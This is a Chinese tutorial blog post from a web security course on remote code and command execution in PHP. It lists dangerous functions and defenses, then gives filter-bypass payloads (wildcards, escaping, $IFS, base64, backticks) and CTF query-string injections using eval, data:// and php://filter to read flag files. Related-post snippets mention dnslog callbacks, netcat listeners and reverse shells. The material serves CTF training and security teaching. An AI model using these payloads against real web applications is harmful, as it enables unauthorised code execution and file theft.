Day58:WEB攻防-RCE代码&命令执行&过滤绕过&异或无字符&无回显方案&黑白盒挖掘

最新推荐文章于 2024-05-30 08:00:00 发布
最新推荐文章于 2024-05-30 08:00:00 发布
阅读量1.5k 收藏 33
点赞数 34
分类专栏: Web攻防 文章标签: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61553520/article/details/137084650
版权
本文详细探讨了RCE(RemoteCodeExecution)原理,包括利用、绕过方法如异或、关键字过滤,以及在不同编程语言中的代码执行和命令执行函数。还涉及了白盒和黑盒场景下的过滤技巧,以及针对过滤和漏洞检测的应对策略。
摘要由CSDN通过智能技术生成

目录

RCE & 代码执行 & 命令执行

RCE-利用&绕过&异或&回显

关键字过滤 - 过滤 flag

过滤执行命令(如cat tac等)

过滤执行空格

无回显利用

演示案例—白盒-CTF-RCE代码命令执行

29-通配符

30-取代函数&通配符&管道符

31-参数逃逸

32~36-配合包含&伪协议

黑盒-运行-RCE代码命令执行

知识点

1、RCE-原理-代码执行&命令执行

2、RCE-黑白盒-过滤绕过&不回显方案

RCE & 代码执行 & 命令执行

RCE代码执行:引用脚本代码解析执行

RCE命令执行:脚本调用操作系统命令

命令执行也是能转换为代码执行的,只不过比较麻烦。

PHP代码执行函数:

eval()、assert()、preg_replace()、create_function()、array_map()、call_user_func()、call_user_func_array()、array_filter()、uasort()、等

PHP命令执行函数:

system()、exec()、shell_exec()、pcntl_exec()、popen()、proc_popen()、passthru()、等

Python:

eval exec subprocess os.system commands

Java:Java中没有类似php中eval函数这种直接可以将字符串转化为代码执行的函数,
但是有反射机制,并且有各种基于反射机制的表达式引擎,如: OGNL、SpEL、MVEL等.

代码执行:

  1. 脚本——java,php,python
  2. 产生——Web源码、中间件平台、其他环境
  3. 检测——白盒 代码审计
  4. 检测——黑盒 漏扫工具、公开漏洞、手工看参数及功能点
  5. 防御——敏感函数禁用、变量过滤或固定、WAF产品

命令执行:

  1. 系统——Linux、Windows
  2. 产生——web源码、中间件平台、其他环境
  3. 检测——白盒 代码审计
  4. 检测——黑盒 漏扫工具,公开漏洞,手工看参数及功能点
  5. 防御——敏感函数禁用、变量过滤或固定、WAF产品
     

RCE-利用&绕过&异或&回显

关键字过滤 - 过滤 flag

通配符绕过

flag=fl*
cat fl*
cat ?la*

转义符号

ca\t /fl\ag
cat fl''ag

使用空变量∗ 和 *和∗和@,x , x,x,{x}绕过

ca$*t fl$*ag
ca$@t fl$@ag
ca$5t f$5lag
ca${2}t f${2}lag

拼接法

a=fl;b=ag;cat$IFS$a$b

反引号绕过

cat `ls`   //在php中这个`反引号代表执行命令的意思

 编码绕过

echo 'flag' | base64
cat `echo ZmxhZwo= | base64 -d`

组合绝活

touch "ag"
touch "fl\\"
touch "t \\"
touch "ca\\"
ls -t >shell  -t是指以时间来展示文件
sh shell
#  \指的是换行
#  ls -t是将文本按时间排序输出
#  ls -t >shell  将输出输入到shell文件中
#  sh将文本中的文字读取出来执行

异或无符号(过滤0-9a-zA-Z)

异或(算法):rce-xor.php //打包好的脚本

异或(算法):rce-xor.py //打包好的脚本

或(算法):rce-xor-or.php//打包好的脚本

或(算法):rce-xor-or.py //打包好的脚本

过滤执行命令(如cat tac等)

more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器,这个也可以查看
vim:一种编辑器,这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
sh /flag 2>%261 //报错出文件内容
curl file:///root/f/flag
strings flag
uniq -c flag
bash -v flag
rev flag

过滤执行空格

%09(url传递)(cat%09flag.php)
cat${IFS}flag
a=fl;b=ag;cat$IFS$a$b
{cat,flag}

无回显利用

直接写个文件访问查看

直接进行对外访问dnslog

演示案例—白盒-CTF-RCE代码命令执行

29-通配符

?c=system('tac fla*.php');

30-取代函数&通配符&管道符

?c=echo shell_exec('tac fla*');

31-参数逃逸

?c=eval($_GET[1]);&1=system('tac flag.php');  //为什么这样写,因为代码只检测参数c

32~36-配合包含&伪协议

?c=include$_GET[a]?>&a=data://text/plain,<?=system('tac flag.php');?>

?c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php

黑盒-运行-RCE代码命令执行

比较有难度,要思考哪些功能点会执行代码或者命令,但是这种不太常见,也可以直接利用工具帮忙探测(awvs、xray等)

例如:
代码在线运行平台测试

反弹shell

Dao-道法自然
关注
  • 34
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
异或脚本rce题目绕过正则表达式必备
12-28
字符串转换成异或型,用于rce绕过正则表达式
第30天:WEB漏洞-RCE代码命令执行漏洞全解1
08-03
2. **攻击**:攻击者可以通过注入特定字符序列,绕过验证,执行非预期的系统命令。 3. **检测**:审计代码中的命令执行函数调用,检查是否有输入验证,同时使用入侵检测系统监控异常行为。 4. **危害**:命令执行...
RCE代码命令执行(详解)
剁椒鱼头没剁椒的博客
12-20 4396
借鉴链接:https://www.cnblogs.com/networkroom/p/16395024.html当然还有很多的其他函数,可以自学百度搜索。在low级别中是接受了用户输入的IP,服务器通过操作性的不同情况执行ping命令,并且Low级别中并未对输入的内容进行过滤。在Medium级别中是对“&&”与“;”进行了过滤,那么这里可以不使用这两个破解符即可,使用别的,比如我之前提到的“|”或者“&”。在High级别中是对“| ”进行过滤了,这里不知道是作者无意间敲了一个空格还是故意的。
超全的命令代码执行漏洞无回显的姿势总结(附带详细代码和测试分析过程)
记录学习,一起进步
03-05 1697
通过:重定向,dnslog外部通信,burpsuite burpcollaborator外部通信,日志监听,netcat监听,反弹shell等不同姿势突破无回显命令执行漏洞
RCE代码执行命令执行
最新发布
qq_68163788的博客
05-30 1196
RCE是一种严重的安全漏洞,允许攻击者通过远程方式执行恶意代码命令在受感染的系统上。这种漏洞可以被利用来获取系统权限、窃取敏感数据、篡改网站内容或者在受感染系统上植入后门,从而使攻击者能够完全控制受感染系统。RCE的危害性极高,因为攻击者可以利用这种漏洞对系统进行广泛的破坏,甚至扩大攻击范围至整个网络。 RCE漏洞通常存在于网络应用程序、操作系统或者其他软件中,攻击者可以通过各种方式发现和利用这些漏洞。
【网络安全RCE漏洞讲解绕过方式及实例介绍
等风来
05-13 969
4、passthru():能将字符串作为OS命令执行,只调用命令不返回任何结果,但把命令的运行结果原样输出到标准输出设备上;6、call_user_func_array():回调函数,第一个参数为函数名,第二个参数为函数参数的数组。2、exec():能将字符串作为OS命令执行,但是只返回执行结果的最后一行(约等于无回显)5、call_user_func():回调函数,第一个参数为函数名,第二个参数为函数的参数。1、system():能将字符串作为OS命令执行,且返回命令执行结果;
[CTF]命令执行回显利用
cosmoslin的博客
02-21 7537
背景 exec,shell_exec等函数可以执行命令但没有回显,我们需要寻找方法来得到命令执行后的结果 <?php highlight__file(__FILE__) shell_exec($_GET[cmd]); ?> 判断命令是否执行 延时 利用sleep函数 cmd=ls|sleep 5 HTTP请求 目标主机通过向VPS发起HTTP请求,VPS监听到请求则代表命令执行成功(注意:ping命令不产生http请求) VPS:nc -lvp 8888 目标主机:cm
回显条件下的命令执行判断和利用方式研究
m0_59598029的博客
08-16 430
在渗透测试、漏洞挖掘安全研究的过程中,我们会遇到很多无回显命令执行点。面对这些无回显命令执行点,我们很难获取命令执行结果,甚至无法判断命令是否执行成功。本篇文章主要讨论面对这些无回显命令执行点时的判断和利用方法。首先我们需要知道该点是否存在命令执行漏洞,或者我们的命令是否执行成功了。这里的研判方法有很多种,最常用的是直接通过延时判断,类似我们sql注入里的时间盲注:值得一提的是,windows下并没有sleep命令,那么如何通过时间延时的方式判断windows环境下的命令执行呢?
命令执行回显的一些姿势
zhangge3663的博客
05-31 3391
前言 最近演练遇到了拿shell后,由于是延时注入,让我极其难受。于是,学习了一下命令执行回显的一些姿势 windows环境 1.ping %USERNAME%.2plmqc.dnslog.cn 这里的%username%为用户变量 附上windows常用变量: %APPDATA% : 列出应用程序数据的默认存放位置。 %CD% : 列出当前目录。 %CLIENTNAME% : 列出联接到终端服务会话时客户端的NETBIOS名。 %CMDCMDLINE% : 列出启动当前
从无回显命令执行到getshell的渗透测试
Javachichi的博客
06-02 742
事情起源于一次渗透测试,机缘巧合之下,发现了一个PHP imap远程命令执行的漏洞点。但尴尬的是,这块命令执行并不会有回显,由此开始了今天的探测之旅。
CVE-2020-36184:CVE-2020-36184 && Jackson-databind RCE
05-29
如何进行RCE pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation=...
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
CVE-2021-2109:通过JNDI的CVE-2021-2109 && Weblogic Server RCE
05-26
描述 Oracle Fusion Middleware(组件:控制台)的Oracle WebLogic Server产品中的漏洞。 受影响的受支持版本为10.3.6.0.0、12.1...如何RCE 步骤1:设定Weblogic 步骤2:登入 步骤3:设定JNDI伺服器 java -cp marshals
xml执行java源码-Axis-1.4-RCE-Poc:Axis<=1.4远程命令执行RCE)POC
06-06
远程命令执行RCE) POC 环境准备 首先下载Axis1.4 本仓库有一个打包好的axis直接解压到tomcat webapps下即可 ,web-inf/web.xml 去掉AdminServlet注释 然后,server-config.wsdd文件开启enableRemoteAdmin (本地...
Web安全 RCE漏洞(命令执行漏洞的 测试和利用).
网络安全领域___专研者.
02-17 4230
系统命令执行的 概括: 系统命令执行一般是在Web应用中,可能有时候需要调用一些系统命令执行,而程序在开发的时候没有对输入进行严格的过滤,导致恶意用户可以构造一些恶意的系统命令,从而达成系统命令执行攻击。 系统命令执行的危害: (1)可以使用Web程序的权限来执行执行系统的命令.(包含读写文件的) (2)利用写入的木马可以连接服务器(反弹shell). (3)进行进一步的渗透,从而可以控制整个网站甚至服务器.
网络安全-渗透测试-RCE远程代码执行漏洞(1)-命令执行代码执行
weixin_52796034的博客
10-26 2901
RCE(Remote Code Execution)远程代码执行漏洞(有时也叫命令执行漏洞)是一种安全漏洞,攻击者可以利用它来执行远程代码,从而控制受影响的系统。这种漏洞通常出现在应用程序或软件中,攻击者可以通过输入恶意构造的指令或数据,使得应用程序或软件在执行执行攻击者指定的代码RCE的范围比较广,只要渗透的最终结果可以实现执行命令或者代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE,通常情况下RCE漏洞都可以归为高危漏洞!
web安全】——命令执行漏洞(RCE)详解
热门推荐
Demo不是emo的博客
09-20 1万+
这个阶段需要沉定来积累经验,靶场,漏洞复现和总结经验才是当前的中心任务,所以我也想好好捋一下其他类型的漏洞,同时也分享出来,今天的内容是命令执行漏洞
web安全RCE漏洞原理
2302_79590880的博客
12-04 730
关于rce漏洞的一些总结,请放心食用。
Web漏洞-RCE代码命令执行漏洞全解-web漏洞产生的原理及条件-墨者靶场详解
ran的博客
04-03 1630
指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。墨者靶场详解。
poc-yaml-thinkphp5023-method-rce poc1
07-29
poc-yaml-thinkphp5023-method-rce poc1 是一种潜在的安全漏洞利用程序,利用该程序可以对使用 ThinkPHP 5.0.23 版本的应用进行远程代码执行攻击。 ThinkPHP 是一款常用的 PHP 框架,版本 5.0.23 存在一个命令行解析漏洞,攻击者可以利用该漏洞在服务器上执行任意命令。poc-yaml-thinkphp5023-method-rce 是一个利用该漏洞的示例程序。 通过 poc1 工具,攻击者可以利用 YAML 文件解析的漏洞,实现远程代码执行。攻击者通过构造恶意 YAML 文件,并将其作为参数发送给目标应用的接口,从而触发代码执行。 该漏洞的危害性很高,攻击者可以在受影响的应用上执行任意命令,例如查看、修改或删除敏感文件,创建新用户账户,获取数据库信息等。这可能导致严重的安全风险和数据泄露。 为了防止此漏洞的利用,建议使用 ThinkPHP 的最新版本,并及时更新框架。此外,应开启严格的访问控制,限制对敏感函数和文件的访问。同时,将任何用户输入数据进行严格过滤和验证,以防止注入攻击。最重要的是,及时关注和安装安全补丁,保持应用程序的安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dao-道法自然

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值